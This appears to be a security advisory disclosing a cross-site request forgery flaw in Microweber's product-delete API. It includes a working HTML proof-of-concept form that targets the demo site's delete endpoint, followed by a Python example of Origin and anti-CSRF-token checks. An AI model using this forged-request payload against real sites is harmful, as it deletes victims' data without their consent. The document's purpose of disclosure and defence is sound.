Cross-Site Request Forgery (CSRF) in microweber/microweber
Jul 30th 2021
An attacker is able to delete any product in the My shop section if they know the value of the ids parameter, because the delete endpoint accepts a cross-site form POST authenticated only by the victim's session cookie.
🕵️‍♂️ Proof of Concept
After opening PoC.html in Firefox or Safari and clicking the submit button (the form can also be auto-submitted), you will see that the product with id 9 has been deleted.
<html>
  <body>
    <!-- rewrites the visible URL only; the browser still sends the victim's session cookie with the cross-site POST -->
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
      <input type="hidden" name="ids" value="9" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Submitting this form deletes the product with id 9.
📍 Location: app.js#L1
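A server-side gate that would reject the forged POST above, written here as an added Python example rather than Microweber's own code (Microweber is a PHP application, and the `Request`, `CsrfGuard`, `handle_delete`, `session` cookie and `_token` field names are all assumptions made for this illustration). It checks the request's Origin/Referer against the site's own origin and requires a per-session anti-CSRF token that a third-party page cannot read.

```python
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import urlsplit

SITE_ORIGIN = "https://demo.microweber.org"  # origin of the admin UI (from the PoC's form action)


@dataclass
class Request:  # minimal stand-in for an incoming HTTP request (constructed for this example)
    method: str
    headers: dict   # e.g. {"Origin": "https://..."}
    form: dict      # POST body fields, e.g. {"ids": "9"}
    cookies: dict   # e.g. {"session": "..."}


class CsrfGuard:
    """Two independent checks a state-changing endpoint should pass before acting."""

    def __init__(self, site_origin: str):
        self.site_origin = site_origin
        self.tokens = {}  # session id -> CSRF token (in-memory store for the example)

    def new_session(self):
        sid, token = secrets.token_hex(16), secrets.token_hex(32)
        self.tokens[sid] = token
        return sid, token  # the legitimate UI embeds `token` in its own forms as `_token`

    def origin_ok(self, req: Request) -> bool:
        # Browsers attach Origin (or at least Referer) to cross-site form posts;
        # history.pushState in the PoC changes the visible path, never the origin.
        src = req.headers.get("Origin") or req.headers.get("Referer")
        if not src:
            return False  # fail closed when neither header is present
        u = urlsplit(src)
        return f"{u.scheme}://{u.netloc}" == self.site_origin

    def token_ok(self, req: Request) -> bool:
        # The attacker's page cannot read the victim's token, so it cannot supply it.
        expected = self.tokens.get(req.cookies.get("session", ""))
        supplied = req.form.get("_token", "")
        return bool(expected) and hmac.compare_digest(expected, supplied)


def handle_delete(guard: CsrfGuard, req: Request):
    """Hardened stand-in for /api/content/delete: authorise first, then parse `ids`."""
    if req.method.upper() != "POST":
        return 405, "method not allowed"
    if not (guard.origin_ok(req) and guard.token_ok(req)):
        return 403, "cross-site request rejected"
    ids = [i.strip() for i in req.form.get("ids", "").split(",") if i.strip()]
    return 200, f"deleted {ids}"  # the real handler would delete these products here
```

Marking the session cookie `SameSite=Lax` is a complementary browser-side defence, but the server-side token check is what protects browsers that do not apply that default.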